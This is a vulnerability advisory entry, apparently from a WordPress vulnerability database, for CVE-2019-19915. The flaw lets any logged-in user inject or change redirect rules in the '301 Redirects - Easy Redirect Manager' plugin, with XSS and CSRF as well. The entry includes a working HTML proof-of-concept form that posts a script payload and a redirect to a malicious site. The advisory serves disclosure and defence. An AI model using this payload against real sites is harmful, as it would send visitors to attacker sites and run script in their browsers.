301 Redirects - Easy Redirect Manager <= 2.40 - Authenticated Arbitrary Redirect Injection and Modification, XSS, and CSRF



Description
The weaknesses allow for any authenticated user, even subscribers, to modify, delete, and inject redirect rules that could potentially result in a loss of site availability, in addition to XSS and CSRF. 
Proof of Concept
<html>
  <body>
    <form action="[URL]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="eps&#95;redirect&#95;save" />
      <input type="hidden" name="id" value="<BODY ONLOAD=alert(1)>" />
      <input type="hidden" name="status" value="301" />
      <input type="hidden" name="url&#95;from" value="" />
      <input type="hidden" name="url&#95;to" value="[MALICIOUS-SITE]" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

References

CVE 2019-19915
URL https://www.wordfence.com/blog/2019/12/critical-vulnerability-patched-in-301-redirects-easy-redirect-manager/

Classification

Type BYPASS

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 99493
Verified No
WPVDB ID 9979

Timeline

Publicly Published 2019-12-19 (about 1 month ago)
Added 2019-12-19 (about 1 month ago)
Last Updated 2019-12-21 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin